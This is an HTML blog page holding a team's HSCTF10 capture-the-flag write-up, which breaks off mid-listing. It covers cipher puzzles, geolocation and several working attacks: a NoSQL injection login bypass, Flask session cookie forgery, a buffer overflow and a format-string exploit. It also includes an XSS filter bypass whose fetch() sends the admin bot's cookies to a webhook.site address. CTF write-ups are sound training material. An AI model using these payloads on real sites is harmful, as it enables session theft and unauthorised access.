<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="jasonlin1222">


    <meta name="subtitle" content="A blog page for everything">






<title>HSCTF10 | JL&#39;s note</title>



    <link rel="icon" href="/favicon.ico">



<style>
    @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&family=Noto+Sans+SC:wght@300;400;500;700&family=Roboto+Mono&display=swap');
</style>



    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    




    <!-- scripts list from _config.yml -->
    
    <script src="/js/frame.js"></script>
    




    <script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
    <script id="MathJax-script" async src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js"></script>







  <!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"></head>
  <body>
    <div class="mask-border">
    </div>

    <div class="wrapper">

      <div class="header">
  <div class="flex-container">
    <div class="header-inner">
      <div class="site-brand-container">
        <a href="/">
          
            JL&#39;s Notes
          
        </a>
      </div>
      <div id="menu-btn" class="menu-btn" onclick="toggleMenu()">
        Menu
      </div>
      <nav class="site-nav">
        <ul class="menu-list">
          
            
              <li class="menu-item">
                <a href="/">Home</a>
              </li> 
                   
          
            
              <li class="menu-item">
                <a href="/archives/">Archive</a>
              </li> 
                   
          
            
              <li class="menu-item">
                <a href="/categories/gallery/">Gallery</a>
              </li> 
                   
          
          
        </ul>
      </nav>
    </div>
  </div>
</div>


      <div class="main">
        <div class="flex-container">
          <article id="post">

  
    <div class="post-head">
    <div class="post-info">
        <div class="tag-list">
            
        </div>
        <div class="post-title">
            
            
                HSCTF10
            
            
        </div>
        <span class="post-date">
            Jun 9, 2023
        </span>
    </div>
    <div class="post-img">
        
            <div class="h-line-primary"></div>
              
    </div>
</div>
    <div class="post-content">
    <p>Here’s team <a target="_blank" rel="noopener" href="https://ctftime.org/team/231887"><strong><code>s0ftpaws</code></strong></a> writeup for HSCTF10.</p>
<p>We placed 53rd with 7695 points.</p>
<img src="/2023/06/09/HSCTF10/Score.png" class="" title="score">

<h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="th3-w3bsite"><a href="#th3-w3bsite" class="headerlink" title="th3-w3bsite"></a>th3-w3bsite</h3><p>the flag is in website source code</p>
<blockquote>
<p>flag{1434} </p>
</blockquote>
<h3 id="an-inaccessible-admin-panel"><a href="#an-inaccessible-admin-panel" class="headerlink" title="an-inaccessible-admin-panel"></a>an-inaccessible-admin-panel</h3><p>Upon viewing login.js, there’s a password validation with a series of calculation and the end result given. simply decoding the function would give us the password</p>
<h4 id="Password-validation"><a href="#Password-validation" class="headerlink" title="Password validation:"></a>Password validation:</h4><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> key = [<span class="number">32421672.5</span>, <span class="number">160022555</span>, <span class="number">197009354</span>, <span class="number">184036413</span>, <span class="number">165791431.5</span>, <span class="number">110250050</span>, <span class="number">203747134.5</span>, <span class="number">106007665.5</span>, <span class="number">114618486.5</span>, <span class="number">1401872</span>, <span class="number">20702532.5</span>, <span class="number">1401872</span>, <span class="number">37896374</span>, <span class="number">133402552.5</span>, <span class="number">197009354</span>, <span class="number">197009354</span>, <span class="number">148937670</span>, <span class="number">114618486.5</span>, <span class="number">1401872</span>, <span class="number">20702532.5</span>, <span class="number">160022555</span>, <span class="number">97891284.5</span>, <span class="number">184036413</span>, <span class="number">106007665.5</span>, <span class="number">128504948</span>, <span class="number">232440576.5</span>, <span class="number">4648358</span>, <span class="number">1401872</span>, <span class="number">58522542.5</span>, <span class="number">171714872</span>, <span class="number">190440057.5</span>, <span class="number">114618486.5</span>, <span class="number">197009354</span>, <span class="number">1401872</span>, <span class="number">55890618</span>, <span class="number">128504948</span>, <span class="number">114618486.5</span>, <span class="number">1401872</span>, <span class="number">26071270.5</span>, <span class="number">190440057.5</span>, <span class="number">197009354</span>, <span class="number">97891284.5</span>, <span class="number">101888885</span>, <span class="number">148937670</span>, <span class="number">133402552.5</span>, <span class="number">190440057.5</span>, <span class="number">128504948</span>, <span class="number">114618486.5</span>, <span class="number">110250050</span>, <span class="number">1401872</span>, <span class="number">44036535.5</span>, <span class="number">184036413</span>, <span class="number">110250050</span>, <span class="number">114618486.5</span>, <span class="number">184036413</span>, <span class="number">4648358</span>, <span class="number">1401872</span>, <span class="number">20702532.5</span>, <span class="number">160022555</span>, <span class="number">110250050</span>, <span class="number">1401872</span>, <span class="number">26071270.5</span>, <span class="number">210656255</span>, <span class="number">114618486.5</span>, <span class="number">184036413</span>, <span class="number">232440576.5</span>, <span class="number">197009354</span>, <span class="number">128504948</span>, <span class="number">133402552.5</span>, <span class="number">160022555</span>, <span class="number">123743427.5</span>, <span class="number">1401872</span>, <span class="number">21958629</span>, <span class="number">114618486.5</span>, <span class="number">106007665.5</span>, <span class="number">165791431.5</span>, <span class="number">154405530.5</span>, <span class="number">114618486.5</span>, <span class="number">190440057.5</span>, <span class="number">1401872</span>, <span class="number">23271009.5</span>, <span class="number">128504948</span>, <span class="number">97891284.5</span>, <span class="number">165791431.5</span>, <span class="number">190440057.5</span>, <span class="number">1572532.5</span>, <span class="number">1572532.5</span>];</span><br><span class="line"></span><br><span class="line">        <span class="keyword">function</span> <span class="title function_">validatePassword</span>(<span class="params">password</span>)&#123;</span><br><span class="line">            <span class="keyword">var</span> encryption = password.<span class="title function_">split</span>(<span class="string">&#x27;&#x27;</span>).<span class="title function_">map</span>(<span class="keyword">function</span>(<span class="params">char</span>) &#123;</span><br><span class="line">                <span class="keyword">return</span> char.<span class="title function_">charCodeAt</span>(<span class="number">0</span>);</span><br><span class="line">            &#125;);</span><br><span class="line">            <span class="keyword">var</span> checker = [];</span><br><span class="line">            <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt; encryption.<span class="property">length</span>; i++) &#123;</span><br><span class="line">                <span class="keyword">var</span> a = encryption[i];</span><br><span class="line">                <span class="keyword">var</span> b = <span class="title function_">fii</span>(a);</span><br><span class="line">                checker.<span class="title function_">push</span>(b);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="variable language_">console</span>.<span class="title function_">log</span>(checker);</span><br><span class="line">            </span><br><span class="line">            <span class="keyword">if</span> (key.<span class="property">length</span> !== checker.<span class="property">length</span>) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            </span><br><span class="line">            <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt; key.<span class="property">length</span>; i++) &#123;</span><br><span class="line">                <span class="keyword">if</span> (key[i] !== checker[i]) &#123;</span><br><span class="line">                    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h4 id="Solution"><a href="#Solution" class="headerlink" title="Solution"></a>Solution</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">key = [<span class="number">32421672.5</span>, <span class="number">160022555</span>, <span class="number">197009354</span>, <span class="number">184036413</span>, <span class="number">165791431.5</span>, <span class="number">110250050</span>, <span class="number">203747134.5</span>, <span class="number">106007665.5</span>, <span class="number">114618486.5</span>, <span class="number">1401872</span>, <span class="number">20702532.5</span>, <span class="number">1401872</span>, <span class="number">37896374</span>, <span class="number">133402552.5</span>, <span class="number">197009354</span>, <span class="number">197009354</span>, <span class="number">148937670</span>, <span class="number">114618486.5</span>, <span class="number">1401872</span>, <span class="number">20702532.5</span>, <span class="number">160022555</span>, <span class="number">97891284.5</span>, <span class="number">184036413</span>, <span class="number">106007665.5</span>, <span class="number">128504948</span>, <span class="number">232440576.5</span>, <span class="number">4648358</span>, <span class="number">1401872</span>, <span class="number">58522542.5</span>, <span class="number">171714872</span>, <span class="number">190440057.5</span>, <span class="number">114618486.5</span>, <span class="number">197009354</span>, <span class="number">1401872</span>, <span class="number">55890618</span>, <span class="number">128504948</span>, <span class="number">114618486.5</span>, <span class="number">1401872</span>, <span class="number">26071270.5</span>, <span class="number">190440057.5</span>, <span class="number">197009354</span>, <span class="number">97891284.5</span>, <span class="number">101888885</span>, <span class="number">148937670</span>, <span class="number">133402552.5</span>, <span class="number">190440057.5</span>, <span class="number">128504948</span>, <span class="number">114618486.5</span>, <span class="number">110250050</span>, <span class="number">1401872</span>, <span class="number">44036535.5</span>, <span class="number">184036413</span>, <span class="number">110250050</span>, <span class="number">114618486.5</span>, <span class="number">184036413</span>, <span class="number">4648358</span>, <span class="number">1401872</span>, <span class="number">20702532.5</span>, <span class="number">160022555</span>, <span class="number">110250050</span>, <span class="number">1401872</span>, <span class="number">26071270.5</span>, <span class="number">210656255</span>, <span class="number">114618486.5</span>, <span class="number">184036413</span>, <span class="number">232440576.5</span>, <span class="number">197009354</span>, <span class="number">128504948</span>, <span class="number">133402552.5</span>, <span class="number">160022555</span>, <span class="number">123743427.5</span>, <span class="number">1401872</span>, <span class="number">21958629</span>, <span class="number">114618486.5</span>, <span class="number">106007665.5</span>, <span class="number">165791431.5</span>, <span class="number">154405530.5</span>, <span class="number">114618486.5</span>, <span class="number">190440057.5</span>, <span class="number">1401872</span>, <span class="number">23271009.5</span>, <span class="number">128504948</span>, <span class="number">97891284.5</span>, <span class="number">165791431.5</span>, <span class="number">190440057.5</span>, <span class="number">1572532.5</span>, <span class="number">1572532.5</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">fii</span>(<span class="params">num</span>):</span><br><span class="line">    <span class="keyword">return</span> num / <span class="number">2</span> + fee(num)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">fee</span>(<span class="params">num</span>):</span><br><span class="line">    <span class="keyword">return</span> foo(num * <span class="number">5</span>, square(num))</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">foo</span>(<span class="params">x, y</span>):</span><br><span class="line">    <span class="keyword">return</span> x*x + y*y + <span class="number">2</span>*x*y</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">square</span>(<span class="params">num</span>):</span><br><span class="line">    <span class="keyword">return</span> num * num</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ans = <span class="string">&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> key:</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">300</span>):</span><br><span class="line">        <span class="keyword">if</span> fii(j) == i:</span><br><span class="line">            ans += <span class="built_in">chr</span>(j)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(ans)</span><br></pre></td></tr></table></figure>
<blockquote>
<p>flag{Admin,Introduce A Little Anarchy, Upset The Established Order, And Everything Becomes Chaos!!}</p>
</blockquote>
<h3 id="mogodb"><a href="#mogodb" class="headerlink" title="mogodb"></a>mogodb</h3><p>The login panel is vulnerable to nosql injection. specifically, the sql request include the use of <code>$where</code> argument is vulnerable to injection</p>
<h4 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">admin</span><br><span class="line">&#x27;; return &#x27;&#x27; == &#x27;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>flag{easier_than_picture_lab_at_least}</p>
</blockquote>
<h3 id="very-secure"><a href="#very-secure" class="headerlink" title="very-secure"></a>very-secure</h3><p>The server uses flask client side session. I.e, we can modify the session value if we know the secret key. The server uses 2 random bytes as secret, which can be bruteforced. </p>
<h4 id="Solution-1"><a href="#Solution-1" class="headerlink" title="Solution"></a>Solution</h4><h5 id="Generate-key-dictionary"><a href="#Generate-key-dictionary" class="headerlink" title="Generate key dictionary"></a>Generate key dictionary</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">k = [i.to_bytes(<span class="number">2</span>, <span class="string">&#x27;little&#x27;</span>) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">2</span> ** <span class="number">16</span>)]</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;wd4.txt&quot;</span>, <span class="string">&quot;wb+&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> k:</span><br><span class="line">        f.write(i + <span class="string">b&quot;\n&quot;</span>)</span><br></pre></td></tr></table></figure>
<h5 id="Get-Secret-Key"><a href="#Get-Secret-Key" class="headerlink" title="Get Secret Key"></a>Get Secret Key</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flask-unsign --wordlist wd4.txt -u --no-literal-eval -c <span class="string">&quot;eyJuYW1lIjoidXNlciJ9.ZIqo9Q.sOJXL1XfFitnRqECX-NZhz4tONo&quot;</span></span><br></pre></td></tr></table></figure>
<h5 id="Get-payload"><a href="#Get-payload" class="headerlink" title="Get payload"></a>Get payload</h5><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flask-unsign -s --secret <span class="string">&quot;b&#x27;\xd0\xaf&#x27;&quot;</span> --cookie <span class="string">&#x27;&#123;&quot;name&quot;:&quot;admin&quot;&#125;&#x27;</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>flag{h0w_d1d_y0u_cr4ck_th3_k3y??} </p>
</blockquote>
<h3 id="fancy-page"><a href="#fancy-page" class="headerlink" title="fancy-page"></a>fancy-page</h3><p>input page has sanitization, but the check is not recursive.<br>E.g,</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">scrscriptipt</span>&gt;</span><span class="tag">&lt;<span class="name">img</span> <span class="attr">title</span>=<span class="string">&quot;&lt;/scrscriptipt&gt;&lt;img src oonnerror=alert(1)&gt;&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">scrscriptipt</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>will yield you an alert.</p>
<p>send this to admin bot and get cookie. The cookie contains the flag</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">scrscriptipt</span>&gt;</span><span class="tag">&lt;<span class="name">img</span> <span class="attr">title</span>=<span class="string">&quot;&lt;/scrscriptipt&gt;&lt;img src oonnerror=fetch(&quot;</span><span class="attr">https:</span>//<span class="attr">webhook.site</span>/<span class="attr">dfdc4973-08cf-4d12-b7cd-0cd724ec63a8</span>&quot;,&#123;<span class="attr">method:</span>&quot;<span class="attr">POST</span>&quot;,<span class="attr">body:document.coocookiekie</span>&#125;)&gt;</span>&quot;&gt;<span class="tag">&lt;/<span class="name">scrscriptipt</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p><code>http://fancy-page.hsctf.com/display.html?title=test&amp;content=%3Cscrscriptipt%3E%3Cimg%20title%3D%22%3C%2Fscrscriptipt%3E%3Cimg%20src%20oonnerror%3Dfetch(%22https%3A%2F%2Fwebhook.site%2Fdfdc4973-08cf-4d12-b7cd-0cd724ec63a8%22%2C%7Bmethod%3A%22POST%22%2Cbody%3Adocument.coocookiekie%7D)%3E%22%3E%3C%2Fscrscriptipt%3E&amp;background_color=%23ffffff&amp;color=%23000000&amp;font=Helvetica&amp;font_size=16</code></p>
<blockquote>
<p>flag{filter_fail}</p>
</blockquote>
<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h3 id="double-trouble"><a href="#double-trouble" class="headerlink" title="double trouble"></a>double trouble</h3><p>Two Caesar Salads</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Hvwg gvcizr bch ps hcc vofr.</span><br><span class="line">Wb toqh, W kwzz uwjs wh hc mci fwuvh bck!</span><br><span class="line">Hvs tzou wg hvs tczzckwbu:</span><br><span class="line">OmqemdOubtqdeMdqOaax</span><br><span class="line">Vcksjsf, wh wg sbqcrsr gc mci vojs hc rsqcrs wh twfgh!</span><br><span class="line">Pkovovovovo</span><br><span class="line">Fsasapsf, hvs tzou tcfaoh wg tzou&#123;&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">This should not be too hard.</span><br><span class="line">In fact, I will give it to you right now!</span><br><span class="line">The flag is the following:</span><br><span class="line">AycqypAgnfcpqYpcAmmj</span><br><span class="line">However, it is encoded so you have to decode it first!</span><br><span class="line">Bwahahahaha</span><br><span class="line">Remember, the flag format is flag&#123;&#125;</span><br></pre></td></tr></table></figure>
<p>The weird looking string is another Caesar cipher</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CaesarCiphersAreCool</span><br></pre></td></tr></table></figure>
<blockquote>
<p>flag{CaesarCiphersAreCool}</p>
</blockquote>
<h3 id="really-small-algorithm"><a href="#really-small-algorithm" class="headerlink" title="really small algorithm"></a>really small algorithm</h3><p>Basic AES</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">n = 4155782502547623093831518113976094054382827573251453061239</span><br><span class="line">e = 65537</span><br><span class="line">c = 2669292279100633236493181205299328973407167118230741040683</span><br></pre></td></tr></table></figure>
<blockquote>
<p>flag{bigger_is_better}</p>
</blockquote>
<h3 id="cupcakes"><a href="#cupcakes" class="headerlink" title="cupcakes"></a>cupcakes</h3><p>Vigenere cipher</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cipher: avxmsvyusbyxj</span><br><span class="line">Key: SIFT</span><br></pre></td></tr></table></figure>
<blockquote>
<p>flag{instantbatter}</p>
</blockquote>
<h3 id="trios-Provided-by-Aaron"><a href="#trios-Provided-by-Aaron" class="headerlink" title="trios (Provided by Aaron)"></a>trios (Provided by <a target="_blank" rel="noopener" href="https://github.com/aaronleetw"><strong><code>Aaron</code></strong></a>)</h3><p>Every 3 letter+number subsitutes to a letter.<br>Given the Encrypted Text:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">8wnAPR2svyje&#123;RbcAPRRbczwtwDE2svphjIqr&#125;. uZbphjRbc 4mL2sv8rv IqruZb BRzuZbAPRzr1Rbc 2svphj RbcphjoZYQHJ8rvzwtIqrRbcHu0 InbRbcBRzBRz2svyjeRbc, tKO8wn 4mLRbc JEzphjuZb4mL tKOIqrBRz APR2svphjyje4zD2svyjeRbc, tKOBRz IqruZb 8wntKOphjHu0 2sv Hu0tKO8wn8wnRbcQHJRbcphjIqr zwtAPR2svtKOphjIqrRbcGawIqr uZb8wn IqrwDERbc BRz2svInbRbc APR2svphjyje4zD2svyjeRbc APRuZbphjyje RbcphjuZb4zDyjewDE IqruZb 8wntKOAPRAPR uZbphjRbc BRzwDERbcRbcIqr uZbQHJ BRzuZb, 2svphjHu0 IqrwDERbcphj 4mLRbc oZYuZb4zDphjIqr IqrwDERbc uZboZYoZY4zDQHJQHJRbcphjoZYRbcBRz uZb8wn Rbc2svoZYwDE APRRbcIqrIqrRbcQHJ. IIqrBRz tKOAPRAPRRbcyje2svAPR IqruZb uZb4mLphj k7j4zDBRzIqr uZbphjRbc yje4zDtKOphjRbc2sv zwttKOyje tKOphj S4mLtKOIqr2stRbcQHJAPR2svphjHu0.</span><br></pre></td></tr></table></figure>
<p>Cipher text with grouping: </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">abcd&#123;ebefgchi&#125;. jhe kcl ij mjbne ch ehoplfieq remmcde, sa ke thjk sim bchducde, sm ij ashq c qsaaepehi fbcshievi ja ige mcre bchducde bjhd ehjudg ij asbb jhe mgeei jp mj, chq igeh ke ojuhi ige joouppehoem ja ecog beiiep. im sbbedcb ij jkh wumi jhe dushec fsd sh xsiepbchq.</span><br></pre></td></tr></table></figure>
<p>Substitution Cipher solution:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">FLAG&#123;ELEPHANT&#125;. ONE WAY TO SOLVE AN ENCRYPTED</span><br><span class="line">MESSAGE, IF WE KNOW ITS LANGUAGE, IS TO FIND</span><br><span class="line">A DIFFERENT PLAINTEXT OF THE SAME LANGUAGE</span><br><span class="line">LONG ENOUGH TO FILL ONE SHEET OR SO, AND THEN</span><br><span class="line">WE COUNT THE OCCURRENCES OF EACH LETTER: TS</span><br><span class="line">ILLEGAL TO OWN JUST ONE GUINBA PIG IN</span><br></pre></td></tr></table></figure>
<blockquote>
<p>flag{elephant}</p>
</blockquote>
<h2 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h2><h3 id="picture-pin-point"><a href="#picture-pin-point" class="headerlink" title="picture-pin-point"></a>picture-pin-point</h3><h4 id="Location-1"><a href="#Location-1" class="headerlink" title="Location 1"></a>Location 1</h4><img src="/2023/06/09/HSCTF10/one.png" class="" title="one">
<p>Google reverse image search finds a similar location. And by walking around on google maps at that general location, we can find the exact location of this bridge<br><strong>Location</strong>: <code>(6.308659, 8.101467)</code></p>
<h4 id="Location-2"><a href="#Location-2" class="headerlink" title="Location 2"></a>Location 2</h4><img src="/2023/06/09/HSCTF10/two.png" class="" title="two">
<p>This image is less obvious with reverse image search. But we can identify the ship through Google search, which ends up in a port at Reykjavik, Iceland.<br><strong>Location</strong>: <code>(64.1561221,-21.9382766)</code></p>
<h4 id="Location-3"><a href="#Location-3" class="headerlink" title="Location 3"></a>Location 3</h4><img src="/2023/06/09/HSCTF10/three.png" class="" title="three">
<p>Third one requires more research. By using the bus as a starting point, we can find the route of bus 100 in Buenos Aires, Argentina. By following the route of this bus, there’s a small bridge that looks identical to the picture.<br><strong>Location</strong>: <code>(-34.6558746,-58.3712334)</code></p>
<blockquote>
<p>flag{worldwide_traveler}</p>
</blockquote>
<h2 id="Pwn"><a href="#Pwn" class="headerlink" title="Pwn"></a>Pwn</h2><h3 id="doubler"><a href="#doubler" class="headerlink" title="doubler"></a>doubler</h3><p>The script convert input to integer, and checks if it’s negative, double the integer, and check if it’s equal to 100. By sending a number just below <code>INT_MAX</code> will pass the <code>&lt;0</code> check and yield a negative number after the program doubles it.<br>final payload (number): <code>2147483598</code></p>
<blockquote>
<p>flag{double_or_nothing_406c561}</p>
</blockquote>
<h3 id="ed"><a href="#ed" class="headerlink" title="ed"></a>ed</h3><p>basic bof</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># p = process(&quot;ed&quot;)</span></span><br><span class="line">p = remote(<span class="string">&quot;ed.hsctf.com&quot;</span>, <span class="number">1337</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;Q&#x27;</span> + <span class="string">b&#x27;A&#x27;</span> * <span class="number">39</span></span><br><span class="line">payload += p64(<span class="number">0x4011d2</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># with open(&quot;l.bin&quot;, &quot;wb&quot;) as f:</span></span><br><span class="line"><span class="comment">#    f.write(payload)</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(payload)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"><span class="built_in">print</span>(p.recvline())</span><br><span class="line">p.wait()</span><br><span class="line"></span><br><span class="line">core = p.corefile</span><br><span class="line"><span class="keyword">for</span> i, j <span class="keyword">in</span> core.registers.items():</span><br><span class="line">    <span class="built_in">print</span>(i, <span class="built_in">hex</span>(<span class="built_in">int</span>(j)))</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<blockquote>
<p>flag{real_programmers_use_butterflies}  </p>
</blockquote>
<h3 id="cat"><a href="#cat" class="headerlink" title="cat"></a>cat</h3><p>format string attack, by dumping the stack we can read the flag that’s opened before reading this buffer.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#p = process(&quot;./chall&quot;)</span></span><br><span class="line">p = remote(<span class="string">&quot;cat.hsctf.com&quot;</span>, <span class="number">1337</span>)</span><br><span class="line">ans = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">20</span>):</span><br><span class="line">    p.sendline(<span class="string">f&quot;%<span class="subst">&#123;i&#125;</span>$p&quot;</span>)</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        k = p.recvline().decode()[<span class="number">2</span>:-<span class="number">1</span>]</span><br><span class="line">        c = <span class="built_in">bytearray</span>.fromhex(k).decode()</span><br><span class="line">        ans += c[::-<span class="number">1</span>]</span><br><span class="line">    <span class="keyword">except</span> ValueError:</span><br><span class="line">        <span class="built_in">print</span>(k)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(ans)</span><br><span class="line">p.close()</span><br></pre></td></tr></table></figure>
<blockquote>
<p>flag{cats_go_meow}</p>
</blockquote>
<h2 id="Rev"><a href="#Rev" class="headerlink" title="Rev"></a>Rev</h2><h3 id="back-to-basic"><a href="#back-to-basic" class="headerlink" title="back-to-basic"></a>back-to-basic</h3><p>Code gives a list of char at certain Location, get the flag by unscrambling it </p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">return</span> password.length() == <span class="number">20</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">0</span>) == <span class="string">&#x27;f&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">11</span>) == <span class="string">&#x27;_&#x27;</span> &amp;&amp;</span><br><span class="line">         password.charAt(<span class="number">1</span>) == <span class="string">&#x27;l&#x27;</span> 